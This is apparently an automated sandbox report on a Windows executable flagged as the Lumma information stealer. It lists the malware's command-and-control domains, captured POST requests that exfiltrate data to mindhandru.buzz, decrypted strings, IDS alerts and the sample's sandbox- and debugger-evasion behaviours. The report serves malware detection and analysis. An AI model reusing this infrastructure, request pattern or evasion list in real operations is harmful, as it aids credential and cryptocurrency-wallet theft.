Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
P0SJULJxI0.exe

Overview

General Information

Sample name:P0SJULJxI0.exe
renamed because original name is a hash value
Original sample name:e5d4e86f709d076fa5bd3e10007f487f.exe
Analysis ID:1580880
MD5:e5d4e86f709d076fa5bd3e10007f487f
SHA1:a3b62c9255ed1c479cc5a01110d33d59f50bc383
SHA256:774d9d60d5ef51a4ce1780aae20047a0cd00c45f25abd0cbba77028c5b752cf4
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • P0SJULJxI0.exe (PID: 5272 cmdline: "C:\Users\user\Desktop\P0SJULJxI0.exe" MD5: E5D4E86F709D076FA5BD3E10007F487F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{
  "C2 url": [
    "mindhandru.buzz",
    "prisonyfork.buzz",
    "rebuildeso.buzz",
    "scentniej.buzz",
    "hummskitnj.buzz",
    "inherineau.buzz",
    "cashfuzysao.buzz",
    "screwamusresz.buzz",
    "appliacnesot.buzz"
  ],
  "Build id": "LOGS11--LiveTraffic"
}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.2067395256.00000000014C3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.2096219412.00000000014C3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.2100391243.0000000001484000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.2100238097.0000000001484000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: P0SJULJxI0.exe PID: 5272JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
                Click to see the 3 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:49:12.560680+010020283713Unknown Traffic192.168.2.849704172.67.165.185443TCP
                2024-12-26T12:49:25.875475+010020283713Unknown Traffic192.168.2.849705172.67.165.185443TCP
                2024-12-26T12:49:28.543470+010020283713Unknown Traffic192.168.2.849707172.67.165.185443TCP
                2024-12-26T12:49:50.522564+010020283713Unknown Traffic192.168.2.849711172.67.165.185443TCP
                2024-12-26T12:50:12.820235+010020283713Unknown Traffic192.168.2.849713172.67.165.185443TCP
                2024-12-26T12:50:15.777767+010020283713Unknown Traffic192.168.2.849714172.67.165.185443TCP
                2024-12-26T12:50:54.725222+010020283713Unknown Traffic192.168.2.849776172.67.165.185443TCP
                2024-12-26T12:50:56.377606+010020283713Unknown Traffic192.168.2.849782172.67.165.185443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:49:24.546737+010020546531A Network Trojan was detected192.168.2.849704172.67.165.185443TCP
                2024-12-26T12:49:26.668292+010020546531A Network Trojan was detected192.168.2.849705172.67.165.185443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:49:24.546737+010020498361A Network Trojan was detected192.168.2.849704172.67.165.185443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:49:26.668292+010020498121A Network Trojan was detected192.168.2.849705172.67.165.185443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:49:48.959861+010020480941Malware Command and Control Activity Detected192.168.2.849707172.67.165.185443TCP
                2024-12-26T12:50:52.235124+010020480941Malware Command and Control Activity Detected192.168.2.849714172.67.165.185443TCP

                Joe Sandbox Signatures

                • AV Detection
                • Compliance
                • Networking
                • System Summary
                • Data Obfuscation
                • Boot Survival
                • Hooking and other Techniques for Hiding and Protection
                • Malware Analysis System Evasion
                • Anti Debugging
                • HIPS / PFW / Operating System Protection Evasion
                • Language, Device and Operating System Detection
                • Lowering of HIPS / PFW / Operating System Security Settings
                • Stealing of Sensitive Information
                • Remote Access Functionality

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: P0SJULJxI0.exeAvira: detected
                Source: https://mindhandru.buzz:443/apiAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/api;Avira URL Cloud: Label: malware
                Source: P0SJULJxI0.exe.5272.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["mindhandru.buzz", "prisonyfork.buzz", "rebuildeso.buzz", "scentniej.buzz", "hummskitnj.buzz", "inherineau.buzz", "cashfuzysao.buzz", "screwamusresz.buzz", "appliacnesot.buzz"], "Build id": "LOGS11--LiveTraffic"}
                Source: P0SJULJxI0.exeVirustotal: Detection: 52%Perma Link
                Source: P0SJULJxI0.exeReversingLabs: Detection: 60%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: P0SJULJxI0.exeJoe Sandbox ML: detected
                Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmpString decryptor: hummskitnj.buzz
                Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
                Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmpString decryptor: appliacnesot.buzz
                Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmpString decryptor: screwamusresz.buzz
                Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmpString decryptor: inherineau.buzz
                Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmpString decryptor: scentniej.buzz
                Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmpString decryptor: rebuildeso.buzz
                Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmpString decryptor: prisonyfork.buzz
                Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmpString decryptor: mindhandru.buzz
                Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmpString decryptor: LOGS11--LiveTraffic
                Source: P0SJULJxI0.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49776 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49782 version: TLS 1.2

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49704 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49704 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49707 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49705 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49705 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49714 -> 172.67.165.185:443
                Source: Malware configuration extractorURLs: mindhandru.buzz
                Source: Malware configuration extractorURLs: prisonyfork.buzz
                Source: Malware configuration extractorURLs: rebuildeso.buzz
                Source: Malware configuration extractorURLs: scentniej.buzz
                Source: Malware configuration extractorURLs: hummskitnj.buzz
                Source: Malware configuration extractorURLs: inherineau.buzz
                Source: Malware configuration extractorURLs: cashfuzysao.buzz
                Source: Malware configuration extractorURLs: screwamusresz.buzz
                Source: Malware configuration extractorURLs: appliacnesot.buzz
                Source: Joe Sandbox ViewIP Address: 172.67.165.185 172.67.165.185
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49704 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49705 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49713 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49776 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49782 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49711 -> 172.67.165.185:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XHG9JAW63CJSAIPNSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12846Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KYAYF5FBE89TQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15051Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4HAC1AYLFTF0J3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20224Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UAQF6MBLGQ601User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1181Host: mindhandru.buzz
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: mindhandru.buzz
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz
                Source: P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: P0SJULJxI0.exe, 00000000.00000003.2067395256.00000000014C3000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096219412.00000000014C3000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2505924911.00000000014CC000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2480422715.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2504533106.00000000014CC000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1625381463.000000000149B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                Source: P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: P0SJULJxI0.exe, 00000000.00000003.2095692358.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096545927.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
                Source: P0SJULJxI0.exe, 00000000.00000003.2095692358.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096545927.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
                Source: P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: P0SJULJxI0.exe, 00000000.00000003.2095692358.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096545927.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: P0SJULJxI0.exe, 00000000.00000003.2095692358.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096545927.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: P0SJULJxI0.exe, 00000000.00000003.2096545927.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
                Source: P0SJULJxI0.exe, 00000000.00000003.1625381463.0000000001462000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2506947715.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1625381463.000000000149B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/
                Source: P0SJULJxI0.exe, 00000000.00000003.2520864101.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2506947715.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000002.2525190295.00000000014F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/;.C
                Source: P0SJULJxI0.exe, 00000000.00000003.2482482732.0000000005C21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/MPh
                Source: P0SJULJxI0.exe, 00000000.00000003.2506445308.0000000001462000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2504979670.0000000001462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/W/
                Source: P0SJULJxI0.exe, 00000000.00000003.1625381463.000000000149B000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2481187488.0000000001462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/api
                Source: P0SJULJxI0.exe, 00000000.00000003.2481187488.0000000001484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/api;
                Source: P0SJULJxI0.exe, 00000000.00000003.2481187488.0000000001462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/apiX/
                Source: P0SJULJxI0.exe, 00000000.00000002.2524940975.0000000001462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/apih&
                Source: P0SJULJxI0.exe, 00000000.00000002.2524940975.0000000001484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/apis
                Source: P0SJULJxI0.exe, 00000000.00000003.2067395256.00000000014F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/c)
                Source: P0SJULJxI0.exe, 00000000.00000003.1625381463.000000000149B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/d
                Source: P0SJULJxI0.exe, 00000000.00000003.2520864101.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000002.2525190295.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1625381463.000000000149B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/pi
                Source: P0SJULJxI0.exe, 00000000.00000003.2096219412.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2520864101.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000002.2525190295.00000000014F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/pid
                Source: P0SJULJxI0.exe, 00000000.00000003.2096219412.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2100181066.00000000014F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/s
                Source: P0SJULJxI0.exe, 00000000.00000003.2520864101.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000002.2525190295.00000000014F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/ste
                Source: P0SJULJxI0.exe, 00000000.00000003.2100181066.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096219412.00000000014C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz:443/api
                Source: P0SJULJxI0.exe, 00000000.00000003.2068940488.0000000005D4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: P0SJULJxI0.exe, 00000000.00000003.2068940488.0000000005D4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: P0SJULJxI0.exe, 00000000.00000003.2095692358.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096545927.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
                Source: P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: P0SJULJxI0.exe, 00000000.00000003.2095692358.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096545927.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
